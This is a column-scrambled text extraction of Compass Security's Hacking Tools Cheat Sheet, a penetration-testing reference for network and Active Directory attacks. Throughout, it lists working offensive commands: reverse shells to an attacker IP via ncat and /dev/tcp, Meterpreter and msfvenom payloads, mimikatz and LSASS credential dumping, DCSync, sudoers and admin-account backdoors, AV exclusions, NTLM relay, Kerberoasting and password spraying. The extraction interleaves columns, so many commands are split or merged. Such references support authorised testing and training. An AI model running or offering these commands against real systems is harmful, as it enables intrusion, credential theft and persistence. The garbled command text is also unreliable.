Specify target via CIDR 10.5.23.

0/24, ranges Useful tcpdump filters: HTTP

Hacking Tools Cheat Sheet 10.13-37.5.1-23 or input file -iL scope.txt. ▪ not arp: No ARP packets
Start Python webserver on port 2305:
v2.0, September 2023, Compass Security
Reverse DNS lookup of IP address range: ▪ port ftp or port 23: Only port 21 or 23
https://www.compass-security.com $ python3 -m http.server 2305
# nmap -sL 10.5.23.0/24 ▪ host 10.5.23.31: Only from/to host
▪ net 10.5.23.0/24: Only from/to networks Start webserver for data up/download:
Basic Linux Networking ARP host discovery: $ goshs -s -ss -p 2305 -b user:hunter2
# nmap -n -sn -PR 10.5.23.0/24 Use tshark or Wireshark for advanced sniffing.
Show IP configuration: Perform HTTP request:
$ ip addr show Host discovery (ARP, ICMP, SYN 443, ACK 80): Sniffing over SSH on a remote host: $ curl http://10.5.23.42:2305/?foo=bar
# nmap -sn -n 10.5.23.0/24 $ ssh 10.5.23.42 sudo tcpdump -w- port
Change MAC address: not ssh | wireshark -k -i - Useful curl options:
# ip link set dev eth0 down SYN scan (half-open scan = SYN/SYN-ACK/RST): ▪ -k: Accept untrusted certificates
# nmap -Pn -n -sS -p 22,80 10.5.23.42 Search in traffic, show HTTP traffic or images:
# macchanger -m 23:05:13:37:42:21 eth0 ▪ -d "foo=bar": HTTP POST data
# ngrep -i pass; urlsnarf; driftnet
# ip link set dev eth0 up List nmap scripts: ▪ -H: "Foo: Bar": HTTP header
Static IP address configuration: $ ls /usr/share/nmap/scripts ▪ -I: Perform HEAD request
IP
# ip addr add 10.5.23.42/24 dev eth0 Scan for EternalBlue vulnerable hosts: ▪ -L: Follow redirects
# ip route add default via 10.5.23.1 # nmap -n -Pn -p 443 --script smb- Test IP forwarding for a specific MAC address: ▪ -o foobar.html: Write output file
DNS and reverse DNS lookup: # nping -e eth0 --tcp -p 443 --dest-
vuln-ms17-010 10.5.23.0/24 ▪ --proxy http://127.0.0.1:8080: Set proxy
mac 23:05:13:37:42:21 8.8.8.8
$ dig compass-security.com Scan for vulnerabilities (script category filter): Scan for common files/applications/configs:
$ dig -x 10.5.23.42 # nmap -n -Pn --script "vuln and safe"
TCP # nikto -host https://example.net
10.5.23.0/24
Information Gathering Listen on TCP port: Enumerate common directory-/filenames:
Run script on non-default port using +: $ feroxbuster -u https://example.net
Find owner of domain or IP address: $ ncat -vnlp 2305
# nmap -n -Pn -p 80 --script +http- -w worlist.txt
$ whois compass-security.com title compass-security.com Connect to TCP port:
$ ncat -v 10.5.23.42 2305 Get wordlists (raft*, wellknown*, quickhits):
Get nameservers and try DNS zone transfer: Performance Tuning (1 SYN packet ≈ 60 bytes ▪ GitHub danielmiessler/SecLists
$ dig example.com ns → 20'000 packets/s ≈ 10 Mbps): ▪ GitHub fuzzdb-project/fuzzdb
$ dig example.com axfr @n1.example.com TLS
# nmap -n -Pn --min-rate 20000
Use multiple sources for hostname discovery: 10.5.23.0/24 Create self-signed certificate:
Shells
# openssl req -x509 -newkey rsa:2048
$ subfinder -d csnc.ch -all Public internet scan databases:
-keyout key.pem -out cert.pem -nodes Start bind shell (on victim):
Sources for hostname / subdomain discovery: ▪ shodan.io, censys.io -subj "/CN=example.net/" $ ncat -vnlp 2305 -e "/bin/bash -i"
▪ crt.sh, virustotal.com, dnsdumpster.com
Sniffing Start TLS Server: Connect to bind shell (on attacker):
$ openssl s_server -cert cert.pem -key $ ncat -v 10.5.23.42 2305
Network Scanning ARP spoofing: key.pem -port 2305
Listen for reverse shell (on attacker):
Useful nmap options: # arpspoof -t 10.5.23.42 10.5.23.1 $ ncat --ssl -l -p 2305 --ssl-cert
$ ncat -vnlp 2305
▪ -n: Disable name and port resolution GUI version: cert.pem --ssl-key key.pem
▪ -PR: ARP host discovery Start reverse shell (on victim):
# ettercap -G Connect to TLS service:
$ ncat -e "/bin/bash -i" 10.5.5.5 2305
▪ -Pn: Disable host discovery Show / delete ARP cache: $ openssl s_client -connect
$ bash -i &>/dev/tcp/10.5.23.5/42 0>&1
▪ -sn: Disable port scan (host discovery only) $ ip neigh show 10.5.23.42:2305
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan # ip neigh flush all $ ncat --ssl 10.5.23.42 2305 More shells on revshells.com.
▪ --top-ports 50: Scan 50 top ports Sniff traffic: Show certificate details of full chain: Upgrade to more functional pseudo terminal:
▪ -iL file: Host input file # tcpdump [options] [filters] $ openssl s_client -showcerts -connect victim $ python -c 'import pty;
▪ -oA file: Write output files (3 file formats) 10.5.23.42:2305 | openssl x509 -text pty.spawn("/bin/bash")'
Useful tcpdump options: victim $ ^Z # press Ctrl-Z
▪ -sC: Script scan (default scripts) ▪ -i interface: Interface or any for all Test TLS server certificate and protocols/ciphers:
attacker $ stty -a # get ROWS/COLS
▪ --script <file/category>: Specific scripts ▪ -n: Disable name and port resolution
$ sslyze compass-security.com:443
attacker $ stty raw -echo
▪ -sV: Version detection ▪ -A: Print in ASCII TCP to TLS proxy: attacker $ fg # press enter twice
▪ -6: IPv6 scan ▪ -XX: Print in hex and ASCII $ socat TCP-LISTEN:2305,fork,reuseaddr victim $ stty rows <ROWS> cols <COLS>
▪ --open: Do not wait for RST (improves speed) ▪ -w file: Write output PCAP file
ssl:example.com:443 victim $ export TERM=xterm-256color
▪ -v/-d: Verbose / debugging output ▪ -r file: Read PCAP file Online TLS tests: ssllabs.com, hardenize.com

Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, https://compass-security.com 1
Vulnerability DBs and Exploits msf > sessions 2 # interact Windows Privilege Escalation Scan for network shares:
meterpreter > sysinfo # use it $ smbmap.py --host-file hosts.txt -u
Exploit search (local copy of the Exploit-DB): Bypass PowerShell execution policy:
$ searchsploit apache File exchange / execute binary: PS > Set-ExecutionPolicy -Policy
Administrator -p PasswordOrHash
meterpreter > upload beacon.exe bypass -Scope process
Show exploit file path and copy it into clipboard: meterpreter > download c:\keepass.kdb Windows Credentials Gathering
$ searchsploit -p 40142 meterpreter > execute -i -f /your/bin Use AMSI bypasses from amsi.fail.
Start Mimikatz and create log file:
Online vulnerability and exploit databases: Port forwarding to localhost: Check for common privesc techniques: C:\> mimikatz.exe
▪ cvedetails.com, exploit-db.com, meterpreter > portfwd add -l 2323 -p ▪ GitHub carlospolop/PEASS-ng → winPEAS mimikatz # log C:\tmp\mimikatz.log
packetstormsecurity.com 3389 -r 10.5.23.23 ▪ GitHub itm4n/PrivescCheck
mimikatz # privilege::debug
Background Meterpreter session: ▪ GitHub PowerShellMafia/PowerSploit → Show passwords/hashes of logged in users:
Cracking meterpreter > background mimikatz# sekurlsa::logonpasswords
PowerUp.ps1
Online brute force SSH passwords: Pivoting through existing Meterpreter session: Dump lsass.exe using taskmgr or:
Exploit WSUS updates delivered via HTTP:
# ncrack -p 22 --user root -P msf > use post/multi/manage/autoroute PS > (Get-Process -Name lsass).Id
$ pywsus --host 10.5.23.42 --port 8530
passwords.txt 10.5.23.0/24 msf > set session 2 # meterpreter sess PS > procdump.exe -accepteula -ma
--executable /opt/psexec64.exe --
Determine hash type: msf > run <pid> c:\lsass.dmp
command '/accepteula /s cmd.exe /c
# hashid 869d[...]bd88 msf > route PS > rundll32.exe
"powershell.exe -encodedCommand J[…]"'
C:\windows\System32\comsvcs.dll
Show example hash types for hashcat: SOCKS via Meterpreter (requires autoroute): Add new local admin to persist after privesc: MiniDump <pid> C:\lsass.dmp full
$ hashcat --example-hashes msf > use auxiliary/server/socks4a C:\> net user backdoor hunter2
msf > set SRVPORT 8080 Read LSASS process dump:
Crack hashes (e.g. type 1000 for NTLM): C:\> net localgroup Administrators
msf > run mimikatz# sekurlsa::minidump lsass.dmp
$ hashcat -m 1000 -a 0 hash.txt -r backdoor /add
$ pypykatz lsa minidump lsass.dmp
rules.txt /opt/wordlists/* Configure ProxyChains: Add AV exclusion:
# vi /etc/proxychains.conf Dump LSASS remotely:
Crack hashes using John the Ripper: PS > Add-MpPreference -ExclusionPath
[...] $ lsassy -u admin -H e8[…]97 hostname
$ john --wordlist=pwds.txt hash.txt C:\tmp\
socks4 127.0.0.1 1080 Export SYSTEM & SAM hive for local users:
Metasploit Framework Connect through SOCKS proxy: Active Directory C:\> reg save HKLM\SYSTEM system.hiv
# proxychains ncat 172.23.5.42 2305 C:\> reg save HKLM\SAM sam.hiv
Start Metasploit, search & use exploit: Start process with network credentials:
C:\> runas /netonly Dump hashes from SYSTEN & SAM file:
# msfconsole Linux Privilege Escalation mimikatz# lsadump::sam
msf > search eternalblue /user:example.net\alice powershell.exe
msf > use exploit/windows/smb/ms17_… Check for common privesc techniques: Analyze AD & create report using PingCastle:
/system:system.hiv /sam:sam.hiv
$ secretsdump.py -sam sam.hiv -system
msf exploit(…) > show options ▪ GitHub carlospolop/PEASS-ng → linPEAS C:\> PingCastle.exe --healthcheck -- system.hiv local
msf exploit(…) > set TARGET 10.5.23.42 ▪ GitHub rebootuser/LinEnum explore-trust --explore-forest-trust
msf exploit(…) > exploit Dump local user hashes remotely:
▪ GTFOBins: gtfobins.github.io --no-enum-limit
$ secretsdump.py
Generate reverse shell (WAR): Set SUID bit to shell and start root shell: Gather BloodHound data using SharpHound: example.net/alice:hunter2@hostname
$ msfvenom -p # chmod +s $(which sh) C:\> SharpHound.exe -c $ crackmapexec -u admin --local-auth
java/jsp_shell_reverse_tcp LHOST=<your $ sh -p All,GPOLocalGroup -H :01[…]D03 10.5.23.0/24 –sam
ip address> LPORT=443 -f war > sh.war
Add SUDO backdoor user: Query AD using PowerView: DCSync:
Reverse shell listener: # echo "user ALL=(ALL:ALL) NOPASSWD: PS > Import-Module PowerView.ps1 $ secretsdump.py -just-dc -just-dc-
msf > use exploit/multi/handler ALL" >> /etc/sudoers.d/README PS > Get-Domain user alice example.net/admin:s3cret@dc
msf > set payload PS > Get-DomainUser mimikatz # lsadump::dcsync /user:alice
linux/x64/shell_reverse_tcp PS > Get-DomainTrust
Lateral Movement Linux
msf > set LHOST 10.5.23.42 # attacker PS > Get-DomainComputer Pass-the-Hash
msf > set LPORT 443 Sniff SSH passwords: PS > Get-DomainController
msf > exploit # strace -p "$(pgrep -f PS > Get-DomainGroupMember -Recurse Remote shell:
Upgrade to Meterpreter: /usr/sbin/sshd)" -f -e trace=write -Identity "Domain Admins" $ psexec.py -hashes :23[…]05
background # or press Ctrl-Z ^Z SSH agent hijacking: domain/username@10.5.23.42
background session 1? [y/N] y # export SSH_AUTH_SOCK=/tmp/ssh…/agent Network Shares Alternatives: smbexec.py, wmiexec.py.
msf > sessions # list sessions # ssh-add -l Search for juicy files on domain joined systems:
msf > sessions -u 1 # upgrade C:\> snaffler.exe -s -o snaffler.log
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, https://compass-security.com 2
Access shares: mimikatz# misc::spooler misc::spooler S4U2Self (machine account to local admin): Remove certificate to cleanup:
$ smbclient.py -hashes :23[…]05 /connect:victim /server:attacker C:\> rubeus.exe asktgt /nowrap C:\> whisker.exe clean /target:alice
example.net/alice@10.5.23.42 Coerce via PetitPotam (EFS remote protocol): /domain:example.net /user:"MYHOST$"
Spray hash over a subnet: $ PetitPotam.py -u alice -p hunter2 -d /aes256:23[...]05 Active Directory Certificate Services
example.net attacker victim C:\> rubeus.exe s4u /self /nowrap
$ crackmapexec smb 10.0.1.0/24 -u
/impersonateuser:domainadmin List CAs & find vulnerable templates:
alice -d example.net -H 23[…]05 mimikatz# misc::efs /connect:victim C:\> certify.exe cas
/server:attacker /altservice:cifs/server.example.net
Enable restricted admin mode: /ticket:doI[…]= C:\> certify.exe find /vulnerable
PS > New-ItemProperty -Path Coerce using multiple different techniques: Request certificate with specified subject:
HKLM:\System\CurrentControlSet\Control $ Coercer.py coerce -u alice -p Kerberoasting C:\> certify.exe request
\Lsa -Name DisableRestrictedAdmin hunter2 --target victim --listener-ip /ca:ca.example.net\CA /template:ESC1
-Value 0 -PropertyType DWORD -Force attacker Get users with SPN: /altname:bob /install
PS > Get-DomainUser -SPN
RDP (requires restricted admin mode): Use certificate to get Kerberos ticket:
Password Spraying Kerberoast (hashcat mode 13100):
$ xfreerdp /u:alice /d:example.net C:\> rubeus.exe asktgt /ptt /user:bob
/pth:23[…]05 /v:10.5.23.42 Display password policy: C:\> rubeus.exe kerberoast /certificate:crt.pfx /password:hunter2
C:\> net accounts /domain /outfile:hashes.txt
RDP using mimikatz: /domain:example.net /dc:dc.example.net
mimikatz# sekurlsa::pth /user:alice Password spraying for all domain users: Get users which do not require preauth: NTLM relay to HTTP enrollment endpoint:
/domain:example.net /ntlm: 23[…]05 C:\> rubeus.exe brute /password:s3cret PS > Get-DomainUser -UACFilter $ ntlmrelayx.py -t
/run:"mstsc.exe /restrictedadmin" DONT_REQ_PREAUTH
Password spraying for certain users: http://10.5.23.42/certsrv/certfnsh.asp
C:\> rubeus.exe brute /users:users.txt AS-REP roast (hashcat mode 18200): -smb2support --adcs --template Machine
NTLM Relay /passwords:passwords.txt C:\> rubeus.exe asreproast
Vulnerable if message signing disabled: $ kerbrute passwordspray --dc 10.0.0.5 /format:hashcat /outfile:hashes.txt MS SQL
# nmap -n -Pn -p 445 --script smb- -d example.net users.txt hunter2 Use PowerUpSQL & get instances:
security-mode 10.5.23.0/24 Kerberos Delegation
PS > Import-Module PowerUpSQL.ps1
Kerberos Get unconstrained delegation systems:
Generate relay list: PS > $t = Get-SQLInstanceDomain | Get-
$ crackmapexec smb 10.5.23.0/24 --gen- List Kerberos tickets: PS > Get-DomainComputer -Unconstrained SQLConnectionTest | ? { $_.Status -eq
relay-list targets-smb.txt C:\> klist Watch for forwardable tickets: "Accessible" }; $t
Disable SMB and HTTP in Responder.conf and C:\> rubeus.exe klist C:\> rubeus.exe monitor /interval:10 Get information & vulnerabilities:
C:\> rubeus.exe triage /nowrap PS > $t | Get-SQLServerInfo
start Responder for LLMNR/NBT-NS poisoning:
# responder -I eth0 Dump Kerberos keys: Coerce DC, import ticket & DCSync to privesc. PS > $t | Invoke-SQLAudit -v

NTLM Relay to target and extract SAM file:

mimikatz# sekurlsa::ekeys
Get constrained delegation systems: Coerce (alternatively xp_fileexist):
# ntlmrelayx.py -smb2support Get TGT for current user: PS > Get-DomainUser -TrustedToAuth PS > Get-SQLQuery -Verbose -Query
-t smb://10.5.23.42 C:\> rubeus.exe tgtdeleg PS > Get-DomainComputer -TrustedToAuth "EXEC master.sys.xp_dirtree
'\\10.5.23.42\x,1, 1" -Instance
NTLM Relay using socks proxy: Get TGT for specific user: Get ST using constrained delegation account: "mssql.example.net,1433"
# ntlmrelayx.py -tf targets.txt C:\> rubeus.exe asktgt /user:alice C:\> rubeus.exe s4u
-smb2support -socks /domain:example.net /password:pwd /ptt /domain:example.net /user:sql_user Command execution (requires sysadmin):
PS > Invoke-SQLOSCmd -Command "whoami"
Configure ProxyChains & access files via proxy: Pass-the-key using /rc4, /aes128 or /aes256. /rc4:23[…]05 /impersonateuser:alice
-Rawresults -Instance "mssql…,1433"
$ proxychains smbclient.py /msdsspn:cifs/server.example.net
Pass-the-Ticket: /altservice:host /ptt /nowrap
example.net/alice:InvalidPw@10.5.23.42 C:\> Rubeus.exe ptt /ticket:doI[…]= Useful Online Resources
Dump tickets (luid from rubeus klist) DACL / Shadow Credentials ▪ Compass Link Collection: git.io/secres
Coercion / Connection Triggering
C:\> rubeus.exe dump /luid:0x234205 ▪ The Hacker Recipes: thehacker.recipes
Coerce via shortcut file (clickme.lnk): Use GenericAll/GenericWrite to add certificate:
/nowrap ▪ The Hacker Tools: tools.thehacker.recipes
[InternetShortcut] C:\> whisker.exe add /target:alice
Import ticket: ▪ Hacktricks: book.hacktricks.xyz
URL=https://google.com Get NTLM hash via PKINIT/U2U: ▪ Red Team Notes: ired.team
C:\> rubeus.exe ptt /ticket:doI[…]=
IconIndex=0 C:\> rubeus.exe asktgt /user:alice
IconFile=\\10.5.23.42\icon.ico Get ST: ▪ Get the latest cheat sheet version at GitHub:
/certificate:MI[…]= /password:hunter2
C:\> rubeus.exe asktgs /ticket:doI[…]= /domain:example.net /dc:dc.example.net CompassSecurity/Hacking_Tools_Cheat_Sheet
Coerce via PrinterBug (Print Spooler Service):
/service:cifs/dc.example.net /ptt /getcredentials /show v2.0, September 2023, Compass Security
$ printerbug.py
example.net/alice:pwd@victim attacker https://www.compass-security.com
Hacking Tools Cheat Sheet, v2.0, August 2023, Compass Security, https://compass-security.com 3